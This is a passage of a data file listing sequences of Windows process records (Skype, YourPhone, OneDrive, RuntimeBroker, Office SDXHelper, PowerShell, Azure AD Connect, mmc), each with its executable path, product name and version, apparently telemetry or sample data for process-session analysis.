'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='SDXHelper', params={'SDXHelper', 'Microsoft Office', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\",\"Cmd(name='sdxhelper', params={'Microsoft Office', 'sdxhelper', '16.0.12730.20270', 'c:/program files/microsoft office/root/office16/sdxhelper.exe'})\"],[\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='Microsoft.Photos', params={'', 'c:/program files/windowsapps/microsoft.windows.photos_2020.19111.24110.0_x64__8wekyb3d8bbwe/microsoft.photos.exe', 'Microsoft.Photos'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\"],[\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\",\"Cmd(name='YourPhone', params={'', 'YourPhone', 'c:/program files/windowsapps/microsoft.yourphone_1.20041.91.0_x64__8wekyb3d8bbwe/yourphone.exe'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\"],[\"Cmd(name='RuntimeBroker', params={'c:/windows/system32/runtimebroker.exe', 'RuntimeBroker', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.18362.1'})\",\"Cmd(name='SkypeApp', params={'SkypeApp', 'Microsoft Skype', '8.56.0.102', 'c:/program files/windowsapps/microsoft.skypeapp_14.56.102.0_x64__kzf8qxf38zg5c/skypeapp.exe'})\",\"Cmd(name='OneDrive', params={'OneDrive', 'Microsoft OneDrive', 'c:/users/contosoadmin/appdata/local/microsoft/onedrive/onedrive.exe', '20.052.0311.0011'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\",\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\"],[\"Cmd(name='powershell', params={'powershell', 'c:/windows/system32/windowspowershell/v1.0/powershell.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System', '10.0.14393.0'})\",\"Cmd(name='AzureADConnect', params={'AzureADConnect', 'c:/program files/microsoft azure active directory connect/azureadconnect.exe', 'Microsoft\\u00ae Azure\\u00ae AD Connect', '1.5.30.0'})\"],[\"Cmd(name='msfeedssync', params={'c:/windows/system32/msfeedssync.exe', 'Internet Explorer', '11.00.14393.2007', 'msfeedssync'})\",\"Cmd(name='Explorer', params={'Microsoft\\u00ae Windows\\u00ae Operating System', 'c:/windows/explorer.exe', '10.0.14393.0', 'Explorer'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating 